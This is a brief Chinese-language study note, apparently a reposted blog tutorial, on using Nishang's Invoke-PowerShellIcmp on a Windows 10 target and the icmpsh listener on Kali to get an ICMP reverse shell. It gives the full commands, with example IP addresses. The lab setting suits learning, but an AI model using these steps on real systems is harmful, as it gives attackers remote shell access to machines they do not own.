本文共 807 字,大约阅读时间需要 2 分钟。
本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》Nishang是一款针对PowerShell的渗透工具。
先到github上去下载nishang,并解压 目标机下载nishang 地址:https://github.com/samratashok/nishang 攻击机下载icmpsh 地址:git clone https://github.com/inquisb/icmpsh.git简介:
1,攻击机kali; 目标机 win10 2,win10开启PowerShell (3.0以上的环境中才可使用;win10自带5.1) 3,导入PowerShell框架 4,获取命令-nishang模块 5,kali安装icmpsh工具第一, 目标机配置部分::
nishang的使用是要在PowerShell 3.0以上的环境中才可使用(win10自带5.1) 查看版本 Get-host PowerShell框架是需要导入的 命令:Import-Module nishang地址Import-Module D:\nishang\nishang-master\nishang.psm1
获取命令-nishang模块 Get-Command -Module nishang 第二,(Kali)攻击机配置部分: 进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显./icmpsh_m.py kaliIP 本机IP
./icmpsh_m.py 192.168.0.33 192.168.0.180 在win10中输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.33并执行 即在kali中拿到shell。转载地址:http://iwmlf.baihongyu.com/